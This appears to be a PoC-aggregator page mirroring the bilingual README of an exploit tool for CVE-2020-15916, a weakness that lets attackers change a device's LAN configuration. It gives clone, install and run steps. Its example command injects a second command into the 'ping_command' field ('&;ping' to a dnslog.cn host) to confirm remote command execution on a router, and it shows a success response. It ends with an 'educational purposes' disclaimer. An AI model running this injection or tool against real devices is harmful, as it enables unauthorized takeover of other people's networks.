关联漏洞
描述
This project is a PoC for exploiting CVE-2020-15916, a vulnerability that allows unauthorized changes to the LAN configuration of a device
介绍
# EN
**GenLANConfigAttack** - is a PoC for exploiting **CVE-2020-15916**, a vulnerability that allows unauthorized changes to the LAN configuration of a device.
## Features
- Exploits LAN configuration vulnerability
- Sends malicious payload to alter network settings
- Bypasses security mechanisms for gaining control over the LAN
## How to Use
1. Clone this repository:
```bash
git clone https://github.com/geniuszly/CVE-2020-15916
```
2. Install dependencies:
```bash
pip install -r requirements.txt
```
3. Run the exploit:
```bash
python GenLANConfigAttack.py
```
### Parameters
- `target_ip`: The IP address of the target device.
- `ping_command`: Command to execute on the target device.
- `session_password`: Password for session access.
## Example
```bash
python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
```
```bash
[Response from 192.168.0.1]:
{"success":true,"message":"LAN IP configuration updated successfully"}
```
## CVE Reference
This PoC is for the CVE-2020-15916 vulnerability, which allows attackers to alter the LAN configuration of vulnerable devices by exploiting a weak authentication mechanism.
## Disclaimer
This tool is provided for educational purposes only. Use it responsibly and only in environments where you have explicit permission.
# RU
**GenLANConfigAttack** представляет собой PoC для эксплуатации уязвимости **CVE-2020-15916**, которая позволяет несанкционированно изменять конфигурацию LAN устройства.
## Функции
- Использует уязвимость конфигурации LAN
- Отправляет вредоносный payload для изменения настроек сети
- Обходит механизмы безопасности для получения контроля над LAN
## Как использовать
1. Клонируйте репозиторий:
```bash
git clone https://github.com/geniuszly/CVE-2020-15916
```
2. Установите зависимости:
```bash
pip install -r requirements.txt
```
3. Запустите эксплойт:
```bash
python GenLANConfigAttack.py
```
### Параметры
- `target_ip`: IP-адрес целевого устройства.
- `ping_command`: Команда для выполнения на целевом устройстве.
- `session_password`: Пароль для сессионного доступа.
## Пример
```bash
python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
```
```bash
[Ответ от 192.168.0.1]:
{"success":true,"message":"Конфигурация LAN IP успешно обновлена"}
```
## CVE-ссылка
Этот PoC эксплуатирует уязвимость CVE-2020-15916, которая позволяет злоумышленникам изменять конфигурацию LAN на уязвимых устройствах, используя слабую аутентификацию.
## Отказ от ответственности
Этот инструмент предоставляется исключительно в образовательных целях. Используйте его ответственно и только в тех средах, где у вас есть явное разрешение.
文件快照
[4.0K] /data/pocs/d97ee6b5b0edc3b408121696dbebc6dbb577b6b1
├── [2.4K] GenLANConfigAttack.py
├── [1.0K] LICENSE
└── [3.5K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。